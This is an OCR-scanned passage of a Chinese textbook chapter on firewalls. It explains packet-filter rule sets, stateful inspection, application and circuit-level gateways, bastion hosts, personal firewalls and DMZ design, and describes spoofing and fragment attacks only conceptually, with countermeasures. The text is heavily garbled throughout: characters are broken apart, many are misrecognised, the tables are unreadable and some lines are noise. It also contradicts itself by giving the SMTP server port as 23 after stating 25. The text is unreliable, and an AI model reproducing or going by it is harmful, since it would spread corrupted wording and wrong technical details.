2. 防火 墙 不 能 完全 防止 内 部 威胁 ， 比 如 心 存 不 满 的 职员 或 无 意 中 被 外 部 攻击 者 利用 的 
职员 。 

3. 一 个 安全 设置 不 当 的 无 线 局 域 网 有 可 能 允许 来 自 公 司 外 部 的 访问 。 内 部 防火 墙 把 企业 网 
络 分 成 多 个 部 分 ， 但 是 不 能 阻止 本 地 系统 与 其 他 被 内 部 防火 墙 所 分 割 的 部 分 进行 无 线 通信 。 

4. 笔记 本 电脑 、PDA 或 便携 式 存储 设备 可 能 在 企业 网 以 外 的 地 方 使 用 时 被 感染 了 ， 之 后 
被 连接 到 内 部 网 络 使 用 。 


93 防火墙 的 类 型 


防火 墙 可 以 监控 多 个 层面 的 网 络 流量 。 例 如 从 底层 的 网 络 数据 包 (可 以 是 独立 的 包 或 是 数 
据 流 的 一 部 分 )， 到 传输 层 所 有 连接 的 流量 ,再 到 检查 应 用 层 协议 的 细节 。 选 择 监控 哪 一 层 取 
决 于 防火 墙 的 期 望 访 问 策略 。 防 火 墙 可 以 配置 为 积极 过 滤器 ， 即 只 允许 符合 特定 标准 的 数据 包 
通过 ; 也 可 以 配置 为 消极 过 滤器 ， 即 拒绝 符合 一 定 标准 的 任何 数据 包 。 这 些 标 准 实现 了 先前 所 
讨论 的 防火 墙 的 访问 策略 。 根 据 防 火 墙 的 类 型 ， 它 可 以 对 每 一 个 包 检测 一 个 或 多 个 协议 头 、 每 
个 包 的 载荷 (payload) 或 者 是 一 个 包 序 列 所 产生 的 模式 。 在 这 一 节 中 ， 我 们 会 对 防火 墙 的 主要 
类 型 进行 介绍 。 


93.1 包 过 滤 防 火 墙 


包 过 滤 防 火 墙根 据 一 组 规则 来 检查 每 个 接收 和 发 送 的 了 PP 包 ， 然 后 决定 转发 或 者 丢弃 此 包 ， 
如 图 9-1b 所 示 。 一 般 防火 墙 会 配置 成 双向 过 滤 (从 内 网 出 去 和 进入 内 网 )。 过 滤 规 则 基于 网 络 
包 中 所 包含 的 信息 。 

e 源 IP 地 址 (source IP address); AGA IP 包 的 系统 的 IP 地 址 (例如 ，192.178.1.1 )。 

e 目的 IP 地 址 (destination IP address); 包 要 到 达 的 系统 的 IP 地 址 (例如 ，192.168.1.1 )。 

e 源 和 目的 端 传 输 层 地 址 (source and destination transport-level address): 指 传输 层 (例如 ， 
TCP 或 UDP) 端口 号 ， 其 定义 应 用 程序 ， 比 如 SNMP 和 HTTP。 

IP 协议 域 (IP protocol field); 用 于 定义 传输 协议 。 
e #£0 (interface): 对 于 有 三 个 或 者 更 多 接口 的 防火 墙 来 说 ， 和 定义 哪个 接口 用 于 包 的 出 
站 ， 哪 个 接口 用 于 包 的 人 站 。 

通常 ， 包 过 滤器 设置 成 基于 与 IP Al TCP 头 (header) 域 匹配 的 规则 列表 。 如 果 与 其 中 的 某 
条 规则 匹配 ， 则 调用 此 规则 来 判断 该 包 是 转发 还 是 丢弃 。 如 果 没 有 匹配 的 规则 ， 则 执行 默认 的 
操作 。 有 两 种 可 能 的 默认 策略 : 

e RiUA= EH: 没有 明确 准许 的 将 被 阻止 。 

e 默认 = 转发 : 没有 明确 阻止 的 将 被 准许 。 

默认 丢弃 策略 是 一 种 更 加 保守 的 策略 。 在 该 策略 中 ， 最初， 所 有 的 操作 将 会 被 防火 墙 阻 
止 ， 必 须 一 条 一 条 地 添加 服务 。 该 策略 下 的 用 户 更 容易 感觉 到 防火 墙 的 存在 ， 也 更 有 可 能 把 防 
火 墙 视 为 一 种 阻碍 。 但 是 商业 和 政府 机 构 可 能 会 采用 这 种 策略 。 而 且 ， 随 着 规则 的 增加 ， 用 户 
对 防火 墙 存 在 的 感觉 会 逐渐 减 小 。 默 认 转 发 策略 提高 了 终端 用 户 的 方便 性 ， 但 是 提供 的 安全 性 
也 降低 了 。 实 际 上 ， 安 全 管理 员 必 须 对 每 一 种 透 过 防火 墙 出 现 的 安全 威胁 做 相关 的 处 理 。 这 种 
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策略 通常 被 一 些 开放 的 组 织 所 采用 ， 例 如 大 学 。 


内 部 ( 受 保护 的 ) 外 部 (不 可 信和 的 ) 
网 络 ( 例如 ， 企 业 网 ) 防火 墙 网 络 (例如 ，Internet ) 





a) 通用 模型 












SS 
传输 连接 


BOM ous Ea 


b) 包 过 滤 防 火 增 


d) 应 用 代理 防火 墙 e) 电路 级 代理 防火 墙 
图 9-1 防火 墙 的 几 种 类 型 


K 9-1 是 SMTP 流量 规则 集 的 简化 示例 。 该 规则 的 目的 是 允许 所 有 入 站 和 出 站 的 电子 邮件 
流量 ， 并 禁止 其 他 流量 。 规 则 自 顶 向 下 应 用 到 每 个 数据 包 中 ， 每 条 规则 的 含义 是 : 
ii 1. 允许 从 外 部 源 人 站 的 电子 邮件 流量 (SMTP 入 站 的 端口 是 25 )。 
293 2. 该 规则 试图 允许 对 入 站 的 SMTP 连接 进行 啊 应 。 


表 9-1 包 过 滤 的 例子 


3 内 部 外 部 TCP 允许 


5 任意 任意 任意 任意 任意 禁止 


3. 允许 回 外 部 源 出 站 的 电子 邮件 。 
4. 该 规则 试图 允许 对 出 站 的 SMTP 连接 进行 啊 应 。 
5. 这 是 默认 规则 的 明确 说 明 。 所 有 规则 集 均 隐 含 地 将 此 规则 作为 最 后 一 条 规则 。 
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这 个 规则 集 存 在 几 个 问题 。 规 则 4 允许 任何 目标 端口 号 大 于 1023 的 外 部 流量 进入 。 我 们 
考虑 利用 此 规则 进行 攻击 的 一 个 例子 ， 即 外 部 攻击 者 可 以 建立 一 个 从 攻击 者 5150 端口 到 内 部 
Web 代理 服务 器 8080 端口 的 连接 。 按 理 说 ， 该 行为 应 该 是 被 禁止 的 ， 它 可 能 导致 服务 器 被 攻 
击 。 为 了 应 对 这 种 问题 ， 防 火 墙 规则 集 的 每 一 行 都 应 该 添加 一 个 源 端 口 域 。 对 于 规则 2 和 规则 4 
来 说 ， 源 端口 号 应 该 被 设 定 为 25; 对 于 规则 1 和 规则 3 来 说 ， 源 端口 号 应 该 被 设 定 为 大 于 1023。 

但 是 有 一 个 漏洞 仍然 存在 。 规 则 3 和 规则 4 的 意图 是 任何 内 部 主机 都 可 以 对 外 发 送 邮件 。 
目标 端口 为 25 的 TCP 数据 包 将 被 路 由 到 目标 机 器 上 的 SMTP 服务 器 。 这 种 规则 的 问题 在 于 
SMTP 的 接收 端口 号 为 25 仅仅 是 默认 设置 ， 外 部 的 主机 很 可 能 还 在 25 端口 上 配置 了 其 他 应 
用 。 如 果 应 用 修改 后 的 规则 4， 攻 击 者 很 可 能 通过 发 送 一 个 源 端 口 为 25 的 TCP 包 ， 得 到 内 部 
机 器 的 访问 权限 。 为 了 应 对 这 种 威胁 ， 我 们 可 以 在 规则 的 每 一 行 加 入 ACK 标记 域 。 对 规则 4 
而 言 ， 该 域 表 明 从 外 部 进入 的 数据 包 必 须 设 有 ACK 标记 。 现 在 的 规则 4 应 该 像 下 面 这 样 : 


ae [wea | aac | P| Wi | RMI | me 
mm [as | mw [vcr | vo | nx 


该 规则 利用 了 TCP 连接 的 特性 。 一 旦 连接 建立 ，TCP RÉI ACK 标志 便 被 设置 为 从 男 一 侧 

发 送 的 确认 段 。 这 样 ， 该 规则 允许 TCP 字段 中 设 有 ACK 标记 且 源 端口 号 为 25 的 数据 包 进 入 。 
包 过 滤 防 火 墙 的 一 个 优点 是 简单 。 而 且 ， 通 常 包 过 滤 对 用 户 是 透明 的 ， 而 且 具 有 很 快 的 处 

理 速度 。NIST SP 800-41 列 出 了 包 过 滤 防 火 墙 的 如 下 弱点 : 

e 因为 包 过 滤 防 火 墙 不 检查 更 高 层 (upper-layer) 的 数据 ， 因 此 这 种 防火 墙 不 能 阻止 利用 

了 特定 应 用 的 漏洞 或 功能 所 进行 的 攻击 。 例 如 ， 包 过 滤 防 火 墙 不 能 阻止 特定 的 应 用 命 

A; 如 果 包 过 滤 防 火 墙 允许 一 个 应 用 程序 通过 防火 墙 ， 那么 就 允许 该 应 用 程序 中 所 有 

可 用 的 功能 。 

防火 墙 可 利用 的 信息 有 限 ， 使 得 包 过 滤 防 火 墙 的 日 志 记录 功能 也 有 限 。 包 过 滤 记 录 通 

常 包含 用 于 访问 控制 决策 的 相同 信息 ( 源 地 址 、 目 的 地 址 ， 以 及 通信 类 型 )。 

© 大 多 数 包 过 滤 防 火 墙 不 支持 高 级 的 用 户 认 证 机 制 。 这 种 限制 同样 是 由 于 防火 墙 对 更 高 
层 应 用 功能 缺乏 支持 而 造成 的 。 

o 包 过 滤 防 火 墙 对 利用 TCP/IP 规范 和 协议 栈 存 在 的 问题 进行 的 攻击 没有 很 好 的 应 对 措 
施 ， 比 如 网 络 层 地 址 欺骗 攻击 。 包 过 滤 防 火 墙 不 能 检测 出 包 的 OSI 第 三 层 地 址 信息 的 
改变 ， 人 侵 者 通常 采用 地 址 欺骗 攻击 来 绕 过 防火 墙 平台 的 安全 控制 机 制 。 

e 最 后 ， 由 于 包 过 滤 防 火 墙根 据 几 个 变量 进行 访问 控制 决策 ， 因 此 不 恰当 的 设置 会 引起 
包 过 滤 防 火 墙 的 安全 性 受到 威胁 。 换 句 话 说 ， 在 配置 防火 墙 时 ， 容 易 在 不 经 意 间 违反 
机 构 内 部 的 消息 安全 策略 ， 将 一 些 本 该 拒绝 的 流量 类 型 、 源 地 址 和 目的 地 址 配置 在 允 
许 访问 的 范围 内 。 

下 面 是 针对 包 过 滤 防 火 墙 的 攻击 方式 ， 以 及 合适 的 应 对 措施 : 

o IP 地 址 欺骗 攻击 (IP address spoofing): 入 侵 者 从 外 部 问 内 传送 数据 包 ， 使 用 的 源 IP 地 
址 域 包含 内 部 主机 地 址 。 攻 击 者 希望 使 用 欺骗 性 地 址 能 够 渗透 采用 简单 源 地 址 安全 的 
系统 ， 该 系统 会 接受 来 自 特 定 可 信 内 部 主机 的 数据 包 。 应 对 措施 是 丢弃 那些 从 外 部 接 
口 到 达 的 ， 并 且 IP 地 址 为 内 部 地 址 的 包 。 实 际 上 ， 这 种 应 对 措施 经 常 运 用 在 防火 墙 之 
外 的 路 由 右上 。 

e 源 路 由 攻击 (source routing attack): 源 站 指定 数据 包 在 跨越 Internet 时 应 该 采用 的 路 由 ， 
希望 这 会 绕 过 不 分 析 源 路 由 信息 的 安全 措施 。 应 对 措施 是 丢弃 所 有 使 用 了 此 选项 的 包 。 
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e 细小 分 段 攻 击 (tiny fragment attack): 人 侵 者 利用 IP 分 段 选项 来 产生 特别 小 的 数据 分 段 ， 
并 强制 将 TCP 头 信息 装 人 分 散 的 分 段 中 。 设 计 这 个 攻击 主要 是 为 了 绕 过 基于 TCP 头 信 
县 的 过 滤 规 则 。 通 币 ， 包 过 滤器 将 确定 是 否 过 滤 包 的 第 一 个 分 段 。 在 第 一 个 分 段 被 和 否 
决 的 基础 上 ， 再 单独 过 滤 包 的 所 有 其 他 分 段 。 攻 击 者 希望 过 滤 防 火 墙 只 检查 第 一 个 分 
段 而 允许 其 他 分 段 通 过 。 应 对 细小 分 段 攻 击 的 措施 是 执行 以 下 规则 : 包 的 第 一 个 分 段 
必须 包含 最 少 的 预定 传输 头 。 如 果 第 一 个 分 段 被 否决 ， 过 滤器 将 记 住 这 个 包 ， 并 丢弃 
后 继 的 所 有 分 段 。 


9.3.2 ”状态 检测 防火 墙 


传统 的 包 过 滤器 仅仅 对 单个 数据 包 执 行 过 滤 判 断 ， 而 不 考虑 更 高 层 的 上 下 文 信息 。 要 理解 
上 下 文 信息 的 意义 以 及 为 什么 传统 包 过 滤器 受 限 于 对 上 下 文 信息 的 考虑 ， 需 要 一 点 背景 知识 。 
大 多 数 在 TCP 顶部 运行 的 应 用 程序 都 遵循 客户 端 /服务 器 模式 。 例 如 ， 对 于 简单 邮件 传输 协 
议 (SMTP)， 电 子 邮件 从 客户 端 系 统 传送 到 服务 器 系统 。 客 户 端 系统 产生 了 新 的 电子 邮件 消 
息 ， 和 典型 的 情况 是 来 目 于 用 户 的 输入 。 服 务 需 系统 接收 到 电子 邮件 消息 ， 把 它 放 到 合适 的 用 户 
邮箱 。 SMTP 通过 在 客户 端 和 服务 器 之 间 建 立 TCP 连接 来 进行 操作 ， 其 中 标识 SMTP 服务 器 
应 用 程序 的 TCP 服务 器 端口 号 为 23。SMTP 客户 端的 TCP 端口 号 由 SMTP 客户 端 生成 ， 其 是 
一 个 在 1024 到 65 535 之 间 的 数 。 

通常 情况 下 ， 当 一 个 应 用 程序 使 用 TCP 创建 一 个 到 远程 主机 的 会 话 时 ， 需 要 建立 一 条 
客户 端 与 服务 器 端 之 间 的 TCP 连接 ， 其 中 远程 (服务器) 应 用 程序 的 TCP 端口 号 是 一 个 小 于 
1024 WAX, AHH (AP ihe) 应 用 程序 的 TCP 端口 号 是 一 个 介 于 1024 到 65 535 之 间 的 数 。 小 
于 1024 的 编号 都 是 “周知 ”端口 号 ， 被 永久 性 地 分 配给 特定 的 应 用 程序 (例如 ，25 是 SMTP 
服务 器 )。 介 于 1024 到 65 535 之 间 的 编号 是 动态 产生 的 ， 只 具有 在 一 次 TCP 连接 期 间 的 临时 
CEP 

一 个 简单 的 包 过 滤 防 火 墙 必须 允许 所 有 高 端口 上 的 基于 TCP 的 人 站 网 络 流量 。 这 就 产生 
了 可 以 被 非法 用 户 利 用 的 漏洞 。 

状态 检测 防火 墙 通过 建立 一 个 出 站 (outbound) TCP 连接 目录 来 强制 执行 TCP 流量 的 规则 ， 
如 表 9-2 所 示 。 每 个 当前 建立 的 连接 都 有 一 个 条 目 。 这 样 ， 只 有 当 数 据 包 符 合 这 个 目录 中 的 某 
项 时 ， 包 过 滤 需 才 人 允许 那些 到 达 高 端口 号 的 和 人 站 流量 通过 。 


表 9-2 ”状态 防火 墙 连接 状态 示例 


sO O a O ne f n O eS 


一 个 状态 数据 包 检 测 防火 墙 不 仅 可 以 检查 与 包 过 滤 防 火 墙 相同 的 数据 包 信息 ， 也 可 以 记录 
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AK TCP 连接 的 信息 ( 见 图 9-1c)。 一些 状态 检测 防火 墙 还 跟踪 TCP 包 的 序号 ， 以 阻止 基于 序 
号 的 攻击 ,例如 会 话 动 持 攻击 。 为 了 识别 和 跟踪 相关 的 连接 ， 一 些 状态 检测 防火 墙 甚至 限制 了 
一 些 众所周知 的 协议 如 FTP、IM 和 SIPS 命令 等 的 应 用 数据 量 。 


9.3.3 ”应 用 级 网 关 


应 用 级 网 关 也 称 为 应 用 代理 (application proxy)， 起 到 应 用 级 流量 中 继 需 的 作用 
( 见 图 9-1d)。 用 户 使 用 TCP/IP 应 用 程序 (如 Telnet 或 FTP) 连接 到 网 关 ， 同 时 网 关 要 求 用 
户 提供 要 访问 的 远程 主机 名 。 当 用 户 应 答 并 提供 了 一 个 有 效 的 用 户 ID 和 认证 信息 时 ， 网 关 
会 联系 远程 主机 并 在 两 个 端点 之 间 中 继 包含 应 用 程序 数据 的 TCP 分 段 。 如 果 网 关 没 有 为 特 
定 应 用 程序 实现 代理 代码 ， 则 该 服务 不 受 文 持 ， 并 且 不 能 通过 防火 墙 转发 。 进 一 步 ， 网 关 
可 以 被 设置 为 只 支持 应 用 程序 中 网 络 管理 者 认为 可 接受 的 那 部 分 特性 ， 而 且 拒 绝 所 有 其 他 
的 特性 。 

应 用 级 网 关 往 往 比 包 过 滤器 更 安全 。 应 用 级 网 关 只 需要 审查 几 个 合法 的 应 用 程序 ， 而 不 用 
尝试 处 理 TCP 和 1IP 级 上 允许 和 禁止 的 多 种 可 能 的 组 合 。 男 外 ， 在 应 用 级 上 很 容易 记录 和 审计 
所 有 的 人 站 流量 。 

应 用 级 网 关 的 最 大 缺点 是 带 来 了 对 每 条 连接 的 额外 处 理 开 销 。 实 际 上 ， 在 两 个 终端 用 户 之 
间 有 两 条 接合 连接 ， 网 关 处 在 接合 点 上 ， 网 关 必 须 对 所 有 双 回 的 流量 进行 检查 和 传送 。 


9.3.4 电路 级 网 关 


防火 墙 的 第 4 种 类 型 是 电路 级 网 关 ， 也 称 为 电路 级 代理 ( circuit-level proxy) (ILEI 9-1e)。 
它 可 能 是 单机 系统 或 者 是 应 用 级 网 关 为 特定 应 用 程序 执行 的 专门 功能 。 与 应 用 级 网 关 相似 ， 电 
路 级 网 关 不 允许 端 到 端 (end-to-end) TCP 连接 ; 而 是 建立 两 条 TCP 连接 ， 一 条 在 自身 和 内 部 
主机 TCP 用 户 之 间 ， 另 一 条 在 自身 和 外 部 主机 TCP 用 户 之 间 。 通 常 ,一旦 建立 了 这 两 条 连 
接 ， 网 关 就 在 这 两 条 连接 之 间 中 继 TCP 分 段 ， 不 检查 其 内 容 。 安 全 功能 包括 判断 哪些 连接 是 
允许 的 。 
电路 级 网 关 的 一 个 典型 的 应 用 是 系统 管理 员 信 任 系 统 内 部 用 户 的 情况 。 此 时 ， 电 路 级 网 关 
可 以 被 设置 为 支持 两 种 连接 ， 一 种 是 应 用 级 服务 或 代理 服务 的 人 站 连接 ， 男 一 种 是 电路 级 功能 
的 出 站 连接 。 在 这 样 的 设置 下 ， 电 路 级 网 关 在 检查 入 站 应 用 数据 是 否 有 禁止 的 功能 时 增加 了 一 
些 额外 的 开销 ， 对 于 出 站 的 数据 不 会 有 这 种 开销 。 
电路 级 网 关 实现 的 一 个 例子 是 SOCKS 包 [KOBL92] ; 在 RFC 1928 中 定义 了 SOCKS 的 第 
5 hto RFC 使 用 如 下 方式 定义 SOCKS: 

此 处 描述 的 协议 旨 在 为 TCP 和 UDP 域 中 的 客户 端 - 服务 器 应 用 程序 提供 框架 ， 以 便 安 全 
地 使 用 网 络 防火 墙 的 服务 。 这 个 协议 是 应 用 层 和 传输 层 之 间 的 概念 上 的 “中 介 层 ”(shim-layer)， 
其 不 提供 网 络 层 网 关 的 服务 ， 比 如 转发 ICMP 消息 。 

SOCKS 包含 下 列 组 件 : 

e SOCKS 服务 天， 在 基于 UNIX 的 防火 墙 上 运行 。 SOCKS 也 可 以 在 Windows 系统 上 实现 。 

e SOCKS 客户 库 ， 在 受 防 火 墙 保护 的 内 部 主机 上 运行 。 

o 一 些 标准 的 客户 端 程序 (比如 FTP 和 TELNET) 的 SOCKS 修订 版 。SOCKS 协议 的 实 
现 一 般 包含 基于 TCP 的 客户 端 应 用 程序 的 重新 编译 或 者 重新 连接 ， 或 者 可 供 选 择 的 动 
态 加 载 的 库 ， 使 得 这 些 函 数 可 以 使 用 SOCKS 库 中 适当 的 封装 例 程 。 

当 基于 TCP 的 客户 端 试图 与 只 有 通过 防火 墙 才能 到 达 的 客体 建立 连接 时 (这 种 判断 留待 

执行 时 进行 )， 它 必须 与 SOCKS AR ak K Be NY AA SOCKS 端口 建立 TCP 连接 。SOCKS fk 
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务 位 于 TCP 的 1080 端口 。 如 果 连 接 请 求 成 功 了 ， 客 户 端 与 服务 器 继续 就 使 用 的 认证 方法 进 
行 协商 ， 然 后 用 选 定 的 方法 进行 认证 ， 认 证 通过 之 后 发 送 中 继 请 求 。SOCKS 服务 器 评估 这 个 
请 求 后 ， 建 立 合适 的 连接 或 者 禁止 它 。UDP 交换 也 可 以 用 类 似 的 形式 处 理 。 事 实 上， 对 用 户 
发 送 和 接收 的 UDP 分 段 进行 认 证 要 打开 一 个 TCP 连接 ， 只 要 TCP 连接 打开 ， 即 可 转发 UDP 
AY EX. 


94 ”防火墙 的 布置 


通常 ， 将 防火 墙 布 置 在 运行 普通 操作 系统 (例如 ，UNIX 或 者 Linux 系统 ) 的 独立 机 器 上 ， 
可 以 作为 预先 配置 的 安全 设备 提供 。 防 火 墙 功 能 也 能 够 以 软件 模块 的 形式 布置 在 路 由 器 、LAN 
交换 机 或 者 服务 右上 。 本 节 ， 我 们 将 考虑 防火 墙 的 一 些 其 他 布置 方式 。 


9.4.1 堡垒 主机 


堡垒 主机 被 防火 墙 管理 员 称 为 网 络 安全 中 极 强 的 端 系统 。 通 常 ， 堡 垒 主机 可 以 作为 应 用 级 
或 电路 级 网 关 平 台 , 或 者 可 以 支持 其 他 服务 (如 IPSec)。 保 侄 主 机 的 共同 特征 如 下 : 

© 保 垒 主机 的 硬件 平台 上 运行 操作 系统 的 安全 版 本 ， 使 其 成 为 可 信和 系统 。 

e 只 有 那些 被 网 络 管理 员 认 为 是 基本 的 服务 才 可 以 安装 在 堡垒 主机 上 。 基 本 服务 主要 包 

括 代理 应 用 程序 ， 比 如 DNS、FTP、HTTP 和 SMTP。 

e 在 用 户 被 允许 访问 代理 服务 之 前 ， 堡 人 垒 主 机 可 能 需要 对 其 进行 附加 认证 。 另 外 ， 在 授 
予 用 户 访问 权限 之 前 ， 各 个 代理 服务 可 能 需要 各 自 的 认证 。 
每 个 代理 被 配置 为 只 支持 标准 应 用 命令 集 的 子 集 。 
© 每 个 代理 被 配置 为 只 允许 对 指定 系统 进行 访问 。 这 意味 着 有 限 的 命令 / 特征 集 只 应 用 
于 受 保 护 网 络 的 部 分 系统 。 
每 个 代理 通过 记录 所 有 网 络 流 量 、 每 条 连接 以 及 每 条 连接 的 持续 时 间 来 维护 详细 的 审 
计 信 息 。 审 计 记 录 是 发 现 和 终止 人 侵 攻 击 的 基本 工具 。 
每 个 代理 模块 是 专门 为 网 络 安全 设计 的 非常 小 的 软件 包 。 由 于 它 相 对 简单 ， 检 查 这 样 
的 模块 的 安全 缺陷 比较 容易 。 例 如 ， 一 个 典型 的 UNIX 邮件 应 用 程序 可 能 包含 超过 
20 000 行 代码 ， 而 一 个 邮件 代理 可 能 包含 不 超过 1000 行 的 代码 。 
© 在 堡垒 主机 中 每 一 个 代理 都 独立 于 其 他 的 代理 。 如 果 某 个 代理 的 运行 有 问题 ， 或 发 现 
了 一 个 未 知 的 漏洞 ， 可 以 伸 载 这 个 代理 ， 而 不 影响 其 他 代理 应 用 程序 的 运行 。 而 且 ， 
如 果 用 户 群 需要 一 个 新 服务 的 支持 ， 网 络 管理 员 可 以 容易 地 在 堡垒 主机 上 安装 需要 的 
代理 。 
除了 读 自己 的 初始 配置 文件 以 外 ， 代 理 通常 不 进行 磁盘 读 取 操作 。 因 此 ， 在 文件 系统 
中 那些 包含 可 执行 代码 的 部 分 被 设置 成 只 读 。 这 使 得 入侵 者 难以 在 堡垒 主机 上 安装 特 
洛 伊 木马 、 噢 探 器 或 其 他 危险 文件 。 
e 每 个 代理 在 堡垒 主机 上 有 其 专用 而 且 安 全 的 目录 ， 并 以 一 个 无 特权 的 用 户 身份 运行 。 


9.4.2 基于 主机 的 防火 墙 


基于 主机 的 防火 墙 是 一 个 用 于 保障 个 人 主机 安全 的 软件 模块 。 这 个 模块 在 许多 操作 系统 中 
是 自 之 的 ,或 者 以 附件 的 形式 提供 。 像 传统 的 单机 防火 墙 一 样 ， 主 机 驻 留 (host-resident) 防火 
墙 能 够 过 滤 和 限制 数据 包 流 。 通 常 ， 这 样 的 防火 墙 位 于 服务 器 上 。 这 种 基于 服务 器 或 基于 工作 
站 的 防火 场 有 以 下 优点 : 

o 过 滤 规 则 可 以 根据 主机 环境 定制 ， 既 能 够 执行 服务 大 共有 的 安全 策略 ， 也 能 够 针对 不 
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保护 功能 独立 于 网 络 的 拓扑 结构 。 因 此 ， 不 管 是 内 部 的 攻击 还 是 外 部 的 攻击 都 必须 通 
EB A hit o 

应 用 于 单机 防火 墙 之 间 的 联合 处 ， 基 于 主机 的 防火 墙 提 供 了 一 个 额外 的 保护 层 。 当 在 
网 络 中 添加 新 服务 器 时 ， 只 需 配 置 服务 器 自 带 的 防火 墙 ， 而 不 需 修 改 整个 网 络 的 防火 
墙 设置 。 


9.4.3 ”网 络 设备 防火 墙 


防火 墙 功 能 ， 尤 其 是 数据 包 过 滤 和 状态 检测 功能 ， 通 常 在 网 络 设备 (如 路 由 硕 和 交换 机 ) 
中 提供 以 监视 和 过 滤 通 过 设备 的 数据 包 流 。 它 们 可 用 来 与 堡 鸡 主 机 和 基于 主机 的 防火 墙 一 起 提 
供 额 外 的 保护 层 。 


9.4.4 ”虚拟 防火 墙 


在 虚拟 化 环境 中 ， 不 是 使 用 物理 上 独立 的 设备 作为 服务 右 、 交 换 机 、 路 由 靛 或 防火 墙 堡 双 
主机 ， 而 是 使 用 这 些 设备 的 虚拟 化 版 本 ， 共 享 相同 的 物理 硬件 。 管 理 该 环境 中 的 虚拟 机 的 管理 
程序 也 可 以 提供 防火 墙 功能 。 我 们 将 在 12.8 节 中 进一步 讨论 这 些 蔡 代 方 法 。 


945 个人 防火 墙 


个 人 防火 墙 控 制 个 人 电脑 或 者 工作 站 与 Internet 或 企业 网 络 之 间 的 网 络 流量 。 个 人 防 
火 墙 的 功能 可 以 用 于 家 庭 环 境 或 公司 的 内 网 中 。 通 常 , 个 人 防火 墙 是 个 人 电脑 上 的 一 个 软 
件 模 块 。 在 一 个 有 多 台 计 算 机 连接 到 Internet 的 家 庭 环 境 中 ， 防 火 墙 功能 也 可 以 集成 到 连 
接着 所 有 家 用 电脑 和 DSL, HA ad ll RAE (cable modem) 或 其 他 Internet 接 人 设备 的 路 
HH ft. 

i SS A Bi Si BE CEFR RY yk Si UL Bk Seer fa LG, ABA E 
能 是 拒绝 对 本 机 的 非法 远程 访问 。 防 火 墙 也 能 够 通过 监控 出 站 活动 ,来 试图 检测 和 阻 断 蠕虫 和 
其 他 的 恶意 软件 的 行为 。 

个 人 防火 墙 的 功能 在 Linux 系统 下 由 netfilter 包 来 提供 , 在 BSD 和 Mac OS X 系统 下 则 是 
pf 包 ， 或 者 是 Windows Firewall。 这 些 软件 包 可 以 在 命令 行 或 者 图 形 界 面前 端 进行 配置 。 一 且 
这 样 的 个 人 防火 墙 被 启用 ， 所 有 的 人 站 连接 通常 都 会 被 阻止 ， 除 非 该 连接 得 到 了 用 户 明确 的 许 
可 。 而 出 站 连接 通常 都 会 被 多 许 。 人 站 服务 列表 可 以 有 选择 地 根据 端口 号 被 重新 启用 ， 其 中 包 
括 如 下 篆 见 服务 : 

e 个 人 文件 共享 ( 548，427 ) 
窗口 共享 ( 139 ) 

个 人 网 站 共享 480，427 ) 

远程 登录 一 一 SHH (22) 

FTP 访问 (20~21, 20~21 端口 的 连接 转 到 1024 一 65535 端口 ) 
打印 机 共享 (631, 515) 

IChat Rendezvous ( 5297, 5298 ) 

iTunes 音乐 共享 ( 3869 ) 

CVS ( 2401 ) 

Gnutella/Limewire ( 6346 ) 

ICQ ( 4000 ) 
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IRC (194) 

MSN Messenger ( 6891 ~6900 ) 

网 络 时 间 〈 123 ) 

Retrospect ( 497 ) 

SMB (无 网 络 输入 输出 系统 ，445 ) 
VNC ( 5900~5902 ) 

e WebSTAR Admin ( 1080, 1443 ) 

当 FTP 访问 服务 局 用 ， 本 机 的 20 Al 21 wH] FTP 连接 开放 ; 如 果 有 其 他 连接 从 20 或 
21 端口 连接 到 该 计算 机 ， 则 本 计算 机 上 从 1024 到 65535 的 端口 也 打开 。 

为 了 加 强 保护 ， 用 户 也 可 以 配置 防火 墙 的 高 级 特性 。 例 如 ， 隐 形 模式 Stealth mode) 通过 
丢弃 那些 未 被 请 求 的 通信 和 包 来 隐藏 Internet 中 的 系统 ， 使 之 看 起 来 好 像 并 不 存在 。UDP 数据 包 
能 够 被 阻止 ,并且 限 制 网 络 流量 ， 只 人 允许 开放 端口 的 TCP 数据 包 通过 。 防 火 墙 也 支持 日 志 功 
能 ， 日 志 功 能 是 检查 非 期 望 活动 的 重要 工具 。 其 他 类 型 的 个 人 防火 墙 允 许 用 户 指明 特定 的 应 
用 ， 或 者 由 有 效 证 书 颁 发 机 构 签署 的 应 用 程序 ,来 提供 基于 网 络 访问 的 服务 。 


95 防火墙 的 部 署 和 配置 


如 图 9-1a 所 示 ， 防 火 墙 在 内 部 网 络 与 具有 潜在 不 可 信 流 量 源 的 外 部 网 络 之 间 建 立 了 防护 
屏障 。 在 牢记 防火 墙 的 一 般 原则 的 同时 ， 安 全 管理 员 还 必须 决定 防火 墙 的 部 署 和 所 需要 的 数 
E, ER, 我们 将 讨论 一 些 通常 的 有 关 防 火 墙 部 署 的 选择 。 


9.5.1 DMZ 网 络 


图 9-2 说 明了 一 种 和 常见 的 防火 墙 配 置 ， 包括 内 部 和 外 部 防火 墙 之 间 的 附加 网 段 (请 参见 
图 8-5 )。 外 部 防火 墙 被 设置 在 局 域 网 或 者 企业 网 络 的 边缘 ， 紧 接 在 连接 Internet 或 者 某 个 广 域 
网 (WAN) 的 边界 路 由 的 内 侧 。 一 个 或 更 多 内 部 防火 墙 则 负责 保护 企业 内 部 网 。 在 这 两 种 防火 
墙 之 间 是 由 一 个 或 更 多 设备 联网 形成 的 称 为 “ 非 军事 区 ”( demilitarized zone) 的 网 络 区域 。 那 
些 可 以 从 外 部 访问 但 是 需要 一 定 保护 措施 的 系统 通常 被 设置 在 DMZ 网 络 中 。 一 般 来 说 ，DMZ 
中 的 系统 需要 或 者 本 身 具 有 外 部 连通 性 ， 比 如 一 个 企业 网 站 、 一 个 邮件 服务 器 ， 或 者 一 个 域名 
系统 (DNS) 服务 器 。 

外 部 防火 墙 为 DMZ 系统 提供 符合 其 需要 并 同时 保证 其 外 部 连通 性 的 访问 控制 和 保护 措 
施 。 外 部 防火 墙 同 时 也 为 企业 网 络 的 其 他 部 分 提供 基本 的 安全 保护 。 在 这 种 布局 中 ， 内 部 防火 
场 有 如 下 三 个 服务 目的 : 

1. 与 外 部 防火 墙 相 比 ， 内 部 防火 墙 增加 了 更 严格 的 过 滤 能 力 ， 以 保护 企业 服务 器 和 工作 站 
免 遭 外 部 攻击 。 

2. 对 于 DMZ 网 络 ， 内 部 防火 墙 提供 双重 的 保护 功能 。 首 先 ， 内 部 防火 墙 保护 网 络 的 其 他 
部 分 免 受 由 DMZ 网 络 发 起 的 攻击 ， 这 样 的 攻击 可 能 来 源 于 蠕虫 (worm), rootkit, bot 或 者 其 
